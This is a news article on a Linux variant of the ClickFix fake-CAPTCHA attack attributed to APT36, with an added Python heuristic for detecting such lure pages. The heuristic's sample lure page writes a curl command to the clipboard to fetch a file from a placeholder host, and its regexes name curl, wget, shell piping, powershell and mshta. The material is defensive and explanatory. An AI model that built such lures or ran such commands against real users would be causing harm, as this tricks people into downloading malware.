- Hunt.io researchers have seen a Linux-based ClickFix attack
- For now, it is still harmless
- Researchers believe a Pakistani threat actor is behind the attacks
ClickFix, a type of attack that tricks people into running console commands that download malware while they believe they are fixing a problem, is evolving again.
This time, cybersecurity researchers from Hunt.io said they spotted the attack targeting Linux machines as well.
Originally, ClickFix was designed for Windows devices, but it later extended to macOS. Linux was, for the most part, spared. Until now.
ClickFix strikes Linux
ClickFix works in a simple way: a website is compromised and used to display a pop-up window. This pop-up generally tells the visitor that they must “update” their browser to display the content, or pass a CAPTCHA test to confirm that they are human.
This “update” or “verification” process requires the user to copy a command to the clipboard, open the Run dialog (on Windows), then paste and execute it. This may sound like a stretch, but it is relatively effective, as many cybersecurity companies warn of new ClickFix campaigns emerging left and right.
Hunt.io has attributed this new series of attacks to a Pakistani threat actor called APT36, or Transparent Tribe. The group uses a fake website impersonating India's Ministry of Defense, containing a link to a fake press release. When a victim tries to navigate to the press release, the site checks their operating system, then redirects them to the corresponding attack flow.
For Linux, victims are redirected to a CAPTCHA page that copies a shell command to the clipboard when they click the “I’m not a robot” button. They are then told to press Alt+F2 to open the Linux run dialog, and to paste and execute the command.
The good news is that the attack was spotted while it was still in an experimental phase, which means it has not yet caused significant damage. Apparently, all the shell command does is download a harmless JPEG file. Things could, however, turn sour at any time.
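The lure described above (a fake CAPTCHA page that writes a command to the clipboard and tells the visitor to run it) leaves a recognisable footprint in page source. The following detection heuristic is an added example, not code from Hunt.io or the article; the two HTML pages, the placeholder URL and the indicator patterns are constructed for illustration.

```python
import re

# Constructed sample pages (not taken from the article). LURE_PAGE imitates the pattern the
# article describes: a fake CAPTCHA button that writes a shell command to the clipboard and
# instructs the visitor to run it from the Alt+F2 dialog. BENIGN_PAGE is an ordinary page with a
# legitimate "copy link" button, to show that clipboard use alone does not trigger the heuristic.
LURE_PAGE = """
<div id="captcha">Please complete the verification to continue.</div>
<button onclick="verify()">I'm not a robot</button>
<p>Press Alt+F2, paste and press Enter to confirm you are human.</p>
<script>
function verify() {
  navigator.clipboard.writeText("curl -s http://EXAMPLE-PLACEHOLDER/x.jpg -o /tmp/x.jpg");
}
</script>
"""

BENIGN_PAGE = """
<button onclick="navigator.clipboard.writeText(location.href)">Copy link</button>
<p>Share this article with a friend.</p>
"""

# Indicator categories. A clipboard write is common on legitimate sites; it becomes suspicious
# when it co-occurs with "prove you are human" / "update your browser" text, instructions to
# open a run dialog or terminal, and shell-like content in the page.
CATEGORIES = {
    "clipboard_write": [r"navigator\.clipboard\.writeText", r"execCommand\(\s*['\"]copy['\"]",
                        r"clipboardData\.setData"],
    "lure_text": [r"i['’]m not a robot", r"verify (that )?you are human", r"confirm you are human",
                  r"update (your )?browser"],
    "run_instruction": [r"alt\s*\+\s*f2", r"win(dows)?\s*\+\s*r", r"\bpaste\b.*\b(run|execute|enter)\b",
                        r"\bterminal\b"],
    "shell_like": [r"\b(curl|wget)\b", r"\|\s*(ba|z)?sh\b", r"\bpowershell\b", r"\bmshta\b"],
}


def clickfix_indicators(html: str) -> dict:
    """Return, per category, whether any of its patterns matches the page (case-insensitive)."""
    return {name: any(re.search(p, html, re.IGNORECASE) for p in patterns)
            for name, patterns in CATEGORIES.items()}


def is_clickfix_lure(html: str, required: int = 3) -> bool:
    """Flag a page only when it writes to the clipboard AND at least `required` categories match."""
    hits = clickfix_indicators(html)
    return hits["clipboard_write"] and sum(hits.values()) >= required


if __name__ == "__main__":
    for name, page in (("lure", LURE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, clickfix_indicators(page), "->", is_clickfix_lure(page))
```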
“No additional activity, such as persistence mechanisms, lateral movement or outbound communication, was observed during execution,” the researchers explained.
Via BleepingComputer